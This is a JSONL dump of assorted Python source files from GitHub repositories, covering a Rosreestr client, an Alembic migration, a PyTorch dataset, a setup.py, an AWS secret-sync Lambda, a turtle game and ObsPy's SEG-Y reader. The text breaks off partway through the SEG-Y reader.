item['id']\n return reg\n raise NotFound\n\n @staticmethod\n async def _get_macro_reg(session: aiohttp.ClientSession, dadata_query):\n query = dadata_query['data']['region']\n query = query.replace('Респ', '')\n query = query.replace('/Якутия/', '')\n query = query.strip()\n async with session.get('https://rosreestr.gov.ru/api/online/macro_regions', ssl=SSL_VERIFY) as response:\n data = await response.json()\n for item in data:\n if query.lower() in item['name'].lower():\n return item['id']\n return query\n","repo_name":"avbskyfox/rr_bot","sub_path":"rr_backend/rosreestr.py","file_name":"rosreestr.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15867588863","text":"\"\"\"Adds a Repo.extra field\n\nRevision ID: 8ddc720fb6d2\nRevises: 4ace333da7ba\nCreate Date: 2016-08-29 09:31:11.953895\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '8ddc720fb6d2'\ndown_revision = '4ace333da7ba'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom shaman import models\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('repos', sa.Column('extra', models.types.JSONType(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('repos', 'extra')\n ### end Alembic commands ###\n","repo_name":"ceph/shaman","sub_path":"alembic/versions/8ddc720fb6d2_adds_a_repo_extra_field.py","file_name":"8ddc720fb6d2_adds_a_repo_extra_field.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"} +{"seq_id":"40992621858","text":"import os\n\nimport torch\nimport torchvision.transforms as transforms\n\n\nimport cv2\n\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\n\n\nclass CustomStanfordImageDataset():\n\n def __init__(self, dogs_breed_dictionary,transforms,device):\n\n self.device = device\n self.dogs_breed_dictionary = dogs_breed_dictionary\n\n\n #Loading all the images along with their labels into memory\n self.images_and_labels = []\n\n #Transform which will be applied in order to prepare data for the Neural-Network\n image_transforms = transforms\n\n #Fitting Ordinal and OneHotEncoder to later encode labels\n self.labelEncoder = LabelEncoder()\n self.labelEncoder = self.labelEncoder.fit(list(self.dogs_breed_dictionary.keys()))\n label_encoded = self.labelEncoder.transform(list(self.dogs_breed_dictionary.keys()))\n\n self.oneHotEncoder = OneHotEncoder(sparse=False)\n self.oneHotEncoder = self.oneHotEncoder.fit(label_encoded.reshape(len(label_encoded),1))\n\n\n\n for dog_breed in sorted(list(self.dogs_breed_dictionary.keys())):\n\n # For Each dir, read all the images, and store them into memory with their corrosponding labels i-e dirname\n for dog_image_path in self.dogs_breed_dictionary[dog_breed]:\n try:\n\n loaded_image = cv2.imread(dog_image_path, cv2.IMREAD_COLOR)\n loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2RGB)\n transformed_image = image_transforms(loaded_image)\n\n #Pushing loaded and transformed data into dataset store\n one_hot_encoder_label = torch.tensor(self.oneHotEncoder.transform(self.labelEncoder.transform([dog_breed]).reshape(1,1)), dtype=torch.float32)\n self.images_and_labels.append((transformed_image.type(torch.float32), one_hot_encoder_label))\n\n except Exception as e:\n print(\"Exeception while processing and loading image from disk, Image Skipped\")\n\n\n\n def __getitem__(self, index):\n image_data, image_label = self.images_and_labels[index]\n return (image_data.to(self.device), image_label.to(self.device))\n\n\n def __len__(self):\n return len(self.images_and_labels)\n","repo_name":"m-aamir95/dog-species-classification-streamlit-app","sub_path":"DL_Backend/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74917282539","text":"\"\"\"Setuptools entry point.\"\"\"\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport sys\nimport os\nimport codecs\n\n\ninstall_requires = [\n \"requests>=2.5.0\",\n \"uritemplate>=0.6.0\",\n \"Unidecode>=0.04.14\",\n \"six\",\n]\n\nif sys.version_info < (2, 7, 0):\n install_requires.append('ordereddict')\n\n\nclass Tox(TestCommand):\n\n \"\"\"Tox test command.\"\"\"\n\n user_options = [('tox-args=', 'a', \"Arguments to pass to tox\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.tox_args = '--recreate'\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import tox\n import shlex\n errno = tox.cmdline(args=shlex.split(self.tox_args))\n sys.exit(errno)\n\n\ntests_require = [\n \"httpretty==0.8.4\",\n \"pytest==2.6.4\",\n \"pytest-cov==1.8.1\",\n \"tox\",\n \"pytest-cache\",\n],\n\nimport restnavigator\n\ndirname = os.path.dirname(__file__)\n\nlong_description = (\n codecs.open(os.path.join(dirname, 'README.rst'), encoding='utf-8').read() + '\\n' +\n codecs.open(os.path.join(dirname, 'CHANGES.rst'), encoding='utf-8').read()\n)\n\n\nsetup(\n name=\"restnavigator\",\n version=restnavigator.__version__,\n author=\"Josh Kuhn\",\n author_email=\"deontologician@gmail.com\",\n description='A python library for interacting with HAL+JSON APIs',\n long_description=long_description,\n url='https://github.com/deontologician/rest_navigator',\n license=\"MIT\",\n packages=['restnavigator'],\n keywords=['REST', 'HAL', 'json', 'http'],\n classifiers=[\n \"Development Status :: 6 - Mature\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Topic :: Software Development :: Libraries\",\n \"Topic :: Utilities\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\"\n ] + [(\"Programming Language :: Python :: %s\" % x) for x in \"2.6 2.7 3.0 3.1 3.2 3.3 3.4\".split()],\n install_requires=install_requires,\n tests_require=tests_require,\n extras_require={\n 'test': tests_require,\n },\n cmdclass={'test': Tox},\n)\n","repo_name":"deontologician/restnavigator","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"92"} +{"seq_id":"20166502078","text":"# Q2 Write a Python program to count the frequency of each element in a list and return a dictionary\n# with the elements as keys and their frequencies as values.\ndef count_frequency(input_list):\n frequency_dict = {}\n for element in input_list:\n frequency_dict[element] = frequency_dict.get(element, 0) + 1\n return frequency_dict\ninput_list = input(\"Enter elements of the list separated by spaces: \").split()\nresult = count_frequency(input_list)\nprint(\"Frequency dictionary:\", result)\n","repo_name":"upesacm/21DaysOfCode-2023","sub_path":"Python/Supragya/Day17_Q2.py","file_name":"Day17_Q2.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"3320812854","text":"import os_tools.XmlFileHandler as xh\nimport os_tools.FileHandler as fh\nimport os_tools.Tools as tools\nimport os_tools.StringUtils as su\n\n\n##################################################################################\n#\n# just the StringsImporter boiler plate script\n#\n##################################################################################\n\n\ndef build_strings_dict(xlsx_path, logger):\n \"\"\"\n Will return a dictionary containing all of the strings in the xlsx file.\n The dictionary will look like so:\n {\n \"French\": {\"app_name': \"C'est ma vie\", \"capital\": \"C\"est ma vie\", \"add_tab\": \"Jours de la semaine\"},\n \"German\": {\"app_name\": \"Berufe\\n\", \"capital\": \"Der Weg zur Post\", \"add_tab\":},\n \"Hindi\": {\"app_name\": \"शब्दावली\", \"capital\": \"देशों\", \"add_tab\": \"कंबोडिया\"}\n }\n \"\"\"\n from pyexcel_xlsx import get_data\n import json\n raw_workbook_data = get_data(xlsx_path, start_row=3, start_column=5, column_limit=1)\n # data_values = get_data(xlsx_path, start_row=3, end_row=len(output_dict),start_column=1, column_limit=1)\n\n raw_workbook_dict = json.loads(str(json.dumps(raw_workbook_data)))\n # dict_values = json.loads(str(json.dumps(data_values)))\n xlsx_dict = {}\n\n # start the workbooks loop\n for language in raw_workbook_dict.keys():\n language_dict = {}\n\n # scrape the codes list\n codes_list = list(filter(None, raw_workbook_dict[language]))\n\n # scrape the translated words list\n translated_words_data = get_data(xlsx_path, start_row=3, start_column=1, column_limit=1)[language]\n translated_words_list = translated_words_data[0:len(codes_list)]\n logger.info('Parsing ' + language)\n # loop on all of the codes list (the rightest column)\n for i in range(len(codes_list)):\n if translated_words_list[i] is None or not translated_words_list[i]:\n logger.warning('Seems like the string name \\'' + codes_list[i][0] + '\\' didn\\'t got translated to ' + language + '. Would you like to continue? [yes]')\n to_continue = tools.ask_for_input('')\n if not su.str2bool(to_continue):\n logger.info('Exiting')\n return\n\n else:\n language_dict[codes_list[i][0]] = translated_words_list[i][0]\n\n xlsx_dict[language] = language_dict\n return xlsx_dict\n\n\n# will turn the xlsx dictionary to strings.xml files\ndef xlsx_dict_to_strings_file(xlsx_dict, output_dir, logger):\n logger.info('All of the languages parsed successfully. Creating the strings.xml files')\n for language in xlsx_dict.keys():\n language_output_dir = output_dir + '/' + language\n fh.create_dir(language_output_dir)\n output_file = language_output_dir + '/' + 'strings.xml'\n xml = xh.create_xml_file('resources', output_file)\n language_dict = xlsx_dict[language]\n for key, val in language_dict.items():\n xh.add_node(xml, 'string', {'name': key}, val)\n xh.save_xml_file(xml, output_file, True)\n logger.info('The ' + language + ' language file created successfully in:\\n ' + output_file)\n","repo_name":"osfunapps/os_android_strings_importer-py","sub_path":"os_android_strings_importer/StringsImporterBp.py","file_name":"StringsImporterBp.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"31027689112","text":"from turtle import Turtle, Screen\nimport pandas as pd\n\n# Turtle only accepts images in .gif format\nimage = r'us-states-game-start\\blank_states_img.gif'\nstates_csv_path = r'us-states-game-start\\50_states.csv'\n\nscreen = Screen()\nscreen.title('U.S States Game')\n\n# Making a turtle object in the shape of the image\nscreen.addshape(image)\nTurtle().shape(image)\n\n# Getting list of all states.\nstates_data = pd.read_csv(states_csv_path)\nstates_list = states_data.state.to_list() \n\ngame_is_on = True\nguessed_correctly = 0\n\nwhile game_is_on:\n \n # Game over when all guessed\n if guessed_correctly != 50:\n\n # Taking input from user\n user_answer = screen.textinput(f\"{guessed_correctly}/50 Guessed\", prompt = \"Enter the name of a state: \")\n user_answer_titlecased = user_answer.title()\n\n if user_answer_titlecased == 'Exit':\n game_is_on = False\n \n # Checking if guess exists in state_list\n if user_answer_titlecased in states_list:\n\n turtle = Turtle()\n turtle.hideturtle()\n turtle.penup()\n turtle.color('black')\n\n # Writing state name at correct coordinates\n row = states_data.loc[states_data['state'] == user_answer_titlecased]\n turtle.goto(int(row.x), int(row.y))\n turtle.write(f\"{user_answer}\")\n \n # Removing guessed guessed states from list\n states_list.remove(user_answer_titlecased)\n guessed_correctly += 1\n\n else:\n game_is_on = False\n\n# Csv of all missed states\nmissed_states_dict = {'states': states_list}\nmissed_states_df = pd.DataFrame(missed_states_dict)\nmissed_states_df.to_csv('missed_states.csv')\n\nscreen.exitonclick()\n","repo_name":"kritij19/100-days-of-code","sub_path":"U.S.StatesGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"43606363144","text":"from datetime import datetime\nimport math\nfrom . import FeedSource\n\nSECONDS_PER_DAY = 60 * 60 * 24\n\nclass Norm(FeedSource):\n\n def _norn_feed(self, amplitude, reference_timestamp, current_timestamp, period, phase_offset):\n\t \"\"\"\n\t Given the reference timestamp, the current timestamp, the period (in days), the phase (in days), the reference asset value (ie 1.00) and the amplitude (> 0 && < 1), output the current value.\n\t \"\"\"\n\t waveform = math.sin(((((current_timestamp - (reference_timestamp + phase_offset))/period) % 1) * period) * ((2*math.pi)/period)) # Only change for an alternative HERTZ ABA.\n\t return 1 + (amplitude * waveform)\n \n def _fetch(self):\n feed = {}\n\n reference_timestamp = datetime.strptime(\"2015-10-13T14:12:24\", \"%Y-%m-%dT%H:%M:%S\").timestamp() # Bitshares 2.0 genesis block timestamp\n current_timestamp = datetime.now().timestamp() # Current timestamp for reference within the script\n amplitude = 0.05303030303\n period = SECONDS_PER_DAY * 28\n\n urthr_value = self._norn_feed(\n amplitude,\n reference_timestamp,\n current_timestamp,\n period,\n SECONDS_PER_DAY * 0 # phase offset\n )\n self.add_rate(feed, 'BTS', 'URTHR', urthr_value, 1.0)\n\n verthandi_value = self._norn_feed(\n amplitude,\n reference_timestamp,\n current_timestamp,\n period,\n SECONDS_PER_DAY * 9.33 # phase offset\n )\n self.add_rate(feed, 'BTS', 'VERTHANDI', verthandi_value, 1.0)\n\n skuld_value = self._norn_feed(\n amplitude,\n reference_timestamp,\n current_timestamp,\n period,\n SECONDS_PER_DAY * 18.66 # phase offset\n )\n self.add_rate(feed, 'BTS', 'SKULD', skuld_value, 1.0)\n\n return feed\n","repo_name":"shulthz/bitshares-pricefeed","sub_path":"bitshares_pricefeed/sources/norm.py","file_name":"norm.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"92"} +{"seq_id":"37738628560","text":"# -*- coding: utf-8 -*-\nfrom bda.plone.orders.common import acquire_vendor_or_shop_root\nfrom bda.plone.orders.interfaces import IVendor\nfrom bda.plone.orders.tests import Orders_INTEGRATION_TESTING\nfrom bda.plone.orders.tests import set_browserlayer\nfrom Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom zope.interface import alsoProvides\n\nimport unittest\n\n\nclass TestOrders(unittest.TestCase):\n layer = Orders_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer[\"portal\"]\n self.request = self.layer[\"request\"]\n set_browserlayer(self.request)\n\n\nclass DummyContext(dict):\n __parent__ = None\n\n def __nonzero__(self):\n return True\n\n def __setitem__(self, key, val):\n assert isinstance(val, DummyContext)\n val.__parent__ = self\n super(DummyContext, self).__setitem__(key, val)\n\n\nclass TestOrdersUnit(unittest.TestCase):\n def setUp(self):\n root = DummyContext()\n root[\"sub1\"] = DummyContext()\n root[\"sub1\"][\"subsub1\"] = DummyContext()\n root[\"sub2\"] = DummyContext()\n\n alsoProvides(root, IPloneSiteRoot)\n alsoProvides(root[\"sub1\"], IVendor)\n self.root = root\n\n def test_acquire_vendor_or_shop_root(self):\n root = self.root\n self.assertEqual(\n acquire_vendor_or_shop_root(root[\"sub1\"][\"subsub1\"]), root[\"sub1\"]\n )\n self.assertEqual(acquire_vendor_or_shop_root(root[\"sub2\"]), root)\n","repo_name":"bluedynamics/bda.plone.orders","sub_path":"src/bda/plone/orders/tests/test_orders.py","file_name":"test_orders.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"12143259651","text":"import json\nimport boto3\nimport os\n\ndef main(event, context):\n return sync_secrets(event)\n\ndef sync_secrets(event):\n local_region = os.environ['AWS_REGION']\n remote_region = os.environ['remote_region']\n exceptions = os.environ['exceptions'].split(',')\n secret_id = event[\"detail\"][\"requestParameters\"][\"secretId\"]\n\n if secret_id in exceptions:\n print(f\"Secret-id {secret_id} is in the exceptions list and will not be synced\")\n return {\n 'statusCode': 403,\n 'body': f\"Secret-id {secret_id} is in the exceptions list and will not be synced\" \n }\n\n if not check_secret_availability(secret_id, local_region):\n return {\n 'statusCode': 503,\n 'body': f\"Secret-id {secret_id} is unavailable in {local_region}\" \n }\n\n if not check_secret_availability(secret_id, remote_region):\n return {\n 'statusCode': 503,\n 'body': f\"Secret-id {secret_id} is unavailable in {remote_region}\" \n }\n\n try:\n local_sm = boto3.client('secretsmanager', region_name=local_region)\n remote_sm = boto3.client('secretsmanager', region_name=remote_region)\n\n local_secret_value = local_sm.get_secret_value(SecretId=secret_id)['SecretString']\n remote_secret_value = remote_sm.get_secret_value(SecretId=secret_id)['SecretString']\n \n if local_secret_value != remote_secret_value:\n print(f\"Secret {secret_id} is out of sync\")\n remote_sm.put_secret_value(SecretId=secret_id,SecretString=local_secret_value)\n print(f\"Synchronization complete!\")\n return {\n 'statusCode': 200,\n 'body': f\"Syncing of secret:{secret_id} completed!\"\n }\n else:\n print(f\"Secret {secret_id} is in sync, no need to resync\")\n return {\n 'statusCode': 200,\n 'body': f\"Secret:{secret_id} is already synced!\"\n }\n\n except Exception as e: \n return {\n 'statusCode': 503,\n 'body': e\n }\n \ndef check_secret_availability(secret_id, region):\n sm = boto3.client('secretsmanager', region_name=region)\n try:\n sm.describe_secret(SecretId=secret_id)\n print(f\"Secret {secret_id} is available in {region}\")\n return True\n except Exception as e: \n print(f\"Secret {secret_id} is NOT available in {region}\")\n print(e)\n return False","repo_name":"atanasna/pulumi_examples","sub_path":"sol-1/example_2_sm_syncer/scripts/sm_syncer.py","file_name":"sm_syncer.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71880479021","text":"import io\nimport os\nfrom struct import pack, unpack\nimport warnings\n\nimport numpy as np\n\nfrom obspy import Trace, UTCDateTime\nfrom obspy.core import AttribDict\n\nfrom .header import (BINARY_FILE_HEADER_FORMAT,\n DATA_SAMPLE_FORMAT_PACK_FUNCTIONS,\n DATA_SAMPLE_FORMAT_SAMPLE_SIZE,\n DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS, ENDIAN,\n TRACE_HEADER_FORMAT, TRACE_HEADER_KEYS)\nfrom .unpack import OnTheFlyDataUnpacker\nfrom .util import unpack_header_value, _pack_attribute_nicer_exception\n\n\nclass SEGYError(Exception):\n \"\"\"\n Base SEGY exception class.\n \"\"\"\n pass\n\n\nclass SEGYTraceHeaderTooSmallError(SEGYError):\n \"\"\"\n Raised if the trace header is not the required 240 byte long.\n \"\"\"\n pass\n\n\nclass SEGYTraceReadingError(SEGYError):\n \"\"\"\n Raised if there is not enough data left in the file to unpack the data\n according to the values read from the header.\n \"\"\"\n pass\n\n\nclass SEGYTraceOnTheFlyDataUnpackingError(SEGYError):\n \"\"\"\n Raised if attempting to unpack trace data but no ``unpack_data()`` function\n exists.\n \"\"\"\n pass\n\n\nclass SEGYWritingError(SEGYError):\n \"\"\"\n Raised if the trace header is not the required 240 byte long.\n \"\"\"\n pass\n\n\nclass SEGYWarning(UserWarning):\n \"\"\"\n SEG Y warnings base class.\n \"\"\"\n pass\n\n\nclass SEGYInvalidTextualHeaderWarning(SEGYWarning):\n \"\"\"\n Warning that is raised if an invalid textual header is about to be written.\n \"\"\"\n pass\n\n\nclass SEGYFile(object):\n \"\"\"\n Class that internally handles SEG Y files.\n \"\"\"\n def __init__(self, file=None, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False, read_traces=True):\n \"\"\"\n Class that internally handles SEG Y files.\n\n :param file: A file like object with the file pointer set at the\n beginning of the SEG Y file. If file is None, an empty SEGYFile\n object will be initialized.\n :param endian: The endianness of the file. If None, autodetection will\n be used.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be attempted. If it is None and file is also None, it will default\n to 'ASCII'.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records\n will be read and unpacked. Has a huge impact on memory usage. Data\n will not be unpackable on-the-fly. Defaults to False.\n :type read_traces: bool\n :param read_traces: Data traces will only be read if this is set to\n ``True``. The data will be completely ignored if this is set to\n ``False``.\n \"\"\"\n if file is None:\n self._create_empty_segy_file_object()\n # Set the endianness to big.\n if endian is None:\n self.endian = '>'\n else:\n self.endian = ENDIAN[endian]\n # And the textual header encoding to ASCII.\n if textual_header_encoding is None:\n self.textual_header_encoding = 'ASCII'\n self.textual_header = b''\n return\n self.file = file\n # If endian is None autodetect is.\n if not endian:\n self._autodetect_endianness()\n else:\n self.endian = ENDIAN[endian]\n # If the textual header encoding is None, autodetection will be used.\n self.textual_header_encoding = textual_header_encoding\n # Read the headers.\n self._read_headers()\n # Read the actual traces.\n if read_traces:\n [i for i in self._read_traces(\n unpack_headers=unpack_headers, headonly=headonly)]\n\n def __str__(self):\n \"\"\"\n Prints some information about the SEG Y file.\n \"\"\"\n return '%i traces in the SEG Y structure.' % len(self.traces)\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def _autodetect_endianness(self):\n \"\"\"\n Tries to automatically determine the endianness of the file at hand.\n \"\"\"\n pos = self.file.tell()\n # Jump to the data sample format code.\n self.file.seek(3224, 1)\n format = unpack(b'>h', self.file.read(2))[0]\n # Check if valid.\n if format in DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS.keys():\n self.endian = '>'\n # Else test little endian.\n else:\n self.file.seek(-2, 1)\n format = unpack(b' data_left:\n msg = \"\"\"\n Too little data left in the file to unpack it according to\n its trace header. This is most likely either due to a wrong\n byte order or a corrupt file.\n \"\"\".strip()\n raise SEGYTraceReadingError(msg)\n if headonly:\n # skip reading the data, but still advance the file\n self.file.seek(data_needed, 1)\n # build a function for reading data from the disk on the fly\n self.unpack_data = OnTheFlyDataUnpacker(\n DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS[self.data_encoding],\n self.file.name, self.file.mode, pos, npts, endian=self.endian)\n else:\n # Unpack the data.\n self.data = DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS[\n self.data_encoding](self.file, npts, endian=self.endian)\n\n def write(self, file, data_encoding=None, endian=None):\n \"\"\"\n Writes the Trace to a file like object.\n\n If endian or data_encoding is set, these values will be enforced.\n Otherwise use the values of the SEGYTrace object.\n \"\"\"\n # Set the data length in the header before writing it.\n self.header.number_of_samples_in_this_trace = len(self.data)\n\n # Write the header.\n self.header.write(file, endian=endian)\n if data_encoding is None:\n data_encoding = self.data_encoding\n if endian is None:\n endian = self.endian\n # Write the data.\n if self.data is None:\n msg = \"No data in the SEGYTrace.\"\n raise SEGYWritingError(msg)\n DATA_SAMPLE_FORMAT_PACK_FUNCTIONS[data_encoding](file, self.data,\n endian=endian)\n\n def _create_empty_trace(self):\n \"\"\"\n Creates an empty trace with an empty header.\n \"\"\"\n self.data = np.zeros(0, dtype=np.float32)\n self.header = SEGYTraceHeader(header=None, endian=self.endian)\n\n def __str__(self):\n \"\"\"\n Print some information about the trace.\n \"\"\"\n ret_val = 'Trace sequence number within line: %i\\n' % \\\n self.header.trace_sequence_number_within_line\n ret_val += '%i samples, dtype=%s, %.2f Hz' % (\n len(self.data),\n self.data.dtype, 1.0 /\n (self.header.sample_interval_in_ms_for_this_trace /\n float(1E6)))\n return ret_val\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def __getattr__(self, name):\n \"\"\"\n This method is only called if the attribute is not found in the usual\n places (i.e. not an instance attribute or not found in the class tree\n for self).\n \"\"\"\n if name == 'data':\n # Use data unpack function to unpack data on the fly\n if hasattr(self, 'unpack_data'):\n return self.unpack_data()\n else:\n msg = \"\"\"\n Attempted to unpack trace data on the fly with\n self.unpack_data(), but function does not exist.\n \"\"\".strip()\n raise SEGYTraceOnTheFlyDataUnpackingError(msg)\n else:\n msg = \"'%s' object has no attribute '%s'\" % \\\n (self.__class__.__name__, name)\n raise AttributeError(msg)\n\n def to_obspy_trace(self, unpack_trace_headers=False, headonly=False):\n \"\"\"\n Convert the current Trace to an ObsPy Trace object.\n\n :param unpack_trace_headers:\n \"\"\"\n # Import here to avoid circular imports.\n from .core import LazyTraceHeaderAttribDict # NOQA\n\n # Create new Trace object for every segy trace and append to the Stream\n # object.\n trace = Trace()\n # skip data if headonly is set\n if headonly:\n trace.stats.npts = self.npts\n else:\n trace.data = self.data\n trace.stats.segy = AttribDict()\n # If all values will be unpacked create a normal dictionary.\n if unpack_trace_headers:\n # Add the trace header as a new attrib dictionary.\n header = AttribDict()\n for key, value in self.header.__dict__.items():\n setattr(header, key, value)\n # Otherwise use the LazyTraceHeaderAttribDict.\n else:\n # Add the trace header as a new lazy attrib dictionary.\n header = LazyTraceHeaderAttribDict(self.header.unpacked_header,\n self.header.endian)\n trace.stats.segy.trace_header = header\n # The sampling rate should be set for every trace. It is a sample\n # interval in microseconds. The only sanity check is that is should be\n # larger than 0.\n tr_header = trace.stats.segy.trace_header\n if tr_header.sample_interval_in_ms_for_this_trace > 0:\n trace.stats.delta = \\\n float(self.header.sample_interval_in_ms_for_this_trace) / \\\n 1E6\n # If the year is not zero, calculate the start time. The end time is\n # then calculated from the start time and the sampling rate.\n if tr_header.year_data_recorded > 0:\n year = tr_header.year_data_recorded\n # The SEG Y rev 0 standard specifies the year to be a 4 digit\n # number. Before that it was unclear if it should be a 2 or 4\n # digit number. Old or wrong software might still write 2 digit\n # years. Every number <30 will be mapped to 2000-2029 and every\n # number between 30 and 99 will be mapped to 1930-1999.\n if year < 100:\n if year < 30:\n year += 2000\n else:\n year += 1900\n julday = tr_header.day_of_year\n hour = tr_header.hour_of_day\n minute = tr_header.minute_of_hour\n second = tr_header.second_of_minute\n # work around some strange SEGY files that don't store proper\n # start date/time but only a year (see #1722)\n if julday == 0 and hour == 0 and minute == 0 and second == 0:\n msg = ('Trace starttime does not store a proper date (day '\n 'of year is zero). Using January 1st 00:00 as '\n 'trace start time.')\n warnings.warn(msg)\n julday = 1\n trace.stats.starttime = UTCDateTime(\n year=year, julday=julday, hour=hour, minute=minute,\n second=second)\n return trace\n\n\nclass SEGYTraceHeader(object):\n \"\"\"\n Convenience class that handles reading and writing of the trace headers.\n \"\"\"\n def __init__(self, header=None, endian='>', unpack_headers=False):\n \"\"\"\n Will take the 240 byte of the trace header and unpack all values with\n the given endianness.\n\n :type header: str\n :param header: String that contains the packed binary header values.\n If header is None, a trace header with all values set to 0 will be\n created\n :type big_endian: bool\n :param big_endian: True means the header is encoded in big endian and\n False corresponds to a little endian header.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n \"\"\"\n self.endian = endian\n if header is None:\n self._create_empty_trace_header()\n return\n # Check the length of the string,\n if len(header) != 240:\n msg = 'The trace header needs to be 240 bytes long'\n raise SEGYTraceHeaderTooSmallError(msg)\n # Either unpack the header or just append the unpacked header. This is\n # much faster and can later be unpacked on the fly.\n if not unpack_headers:\n self.unpacked_header = header\n else:\n self.unpacked_header = None\n self._read_trace_header(header)\n\n def _read_trace_header(self, header):\n \"\"\"\n Reads the 240 byte long header and unpacks all values into\n corresponding class attributes.\n \"\"\"\n # Set the start position.\n pos = 0\n # Loop over all items in the TRACE_HEADER_FORMAT list which is supposed\n # to be in the correct order.\n for item in TRACE_HEADER_FORMAT:\n length, name, special_format, _ = item\n string = header[pos: pos + length]\n pos += length\n setattr(self, name, unpack_header_value(self.endian, string,\n length, special_format))\n\n def write(self, file, endian=None):\n \"\"\"\n Writes the header to an open file like object.\n \"\"\"\n if endian is None:\n endian = self.endian\n for item in TRACE_HEADER_FORMAT:\n length, name, special_format, _ = item\n # Use special format if necessary.\n if special_format:\n format = ('%s%s' % (endian,\n special_format)).encode('ascii',\n 'strict')\n file.write(pack(format, getattr(self, name)))\n # Pack according to different lengths.\n elif length == 2:\n format = ('%sh' % endian).encode('ascii', 'strict')\n file.write(pack(format, getattr(self, name)))\n # Update: Seems to be correct. Two's complement integers seem to be\n # the common way to store integer values.\n elif length == 4:\n format = ('%si' % endian).encode('ascii', 'strict')\n file.write(pack(format, getattr(self, name)))\n # Just the one unassigned field.\n elif length == 8:\n field = getattr(self, name)\n # An empty field will have a zero.\n if field == 0:\n field = 2 * pack(('%si' % endian).encode('ascii',\n 'strict'), 0)\n file.write(field)\n # Should not happen.\n else:\n raise Exception\n\n def __getattr__(self, name):\n \"\"\"\n This method is only called if the attribute is not found in the usual\n places (i.e. not an instance attribute or not found in the class tree\n for self).\n \"\"\"\n try:\n index = TRACE_HEADER_KEYS.index(name)\n # If not found raise an attribute error.\n except ValueError:\n msg = \"'%s' object has no attribute '%s'\" % \\\n (self.__class__.__name__, name)\n raise AttributeError(msg)\n # Unpack the one value and set the class attribute so it will does not\n # have to unpacked again if accessed in the future.\n length, name, special_format, start = TRACE_HEADER_FORMAT[index]\n string = self.unpacked_header[start: start + length]\n attribute = unpack_header_value(self.endian, string, length,\n special_format)\n setattr(self, name, attribute)\n return attribute\n\n def __str__(self):\n \"\"\"\n Just returns all header values.\n \"\"\"\n retval = ''\n for _, name, _, _ in TRACE_HEADER_FORMAT:\n # Do not print the unassigned value.\n if name == 'unassigned':\n continue\n retval += '%s: %i\\n' % (name, getattr(self, name))\n return retval\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def _create_empty_trace_header(self):\n \"\"\"\n Init the trace header with zeros.\n \"\"\"\n # First set all fields to zero.\n for field in TRACE_HEADER_FORMAT:\n setattr(self, field[1], 0)\n\n\ndef _read_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Reads a SEG Y file and returns a SEGYFile object.\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be 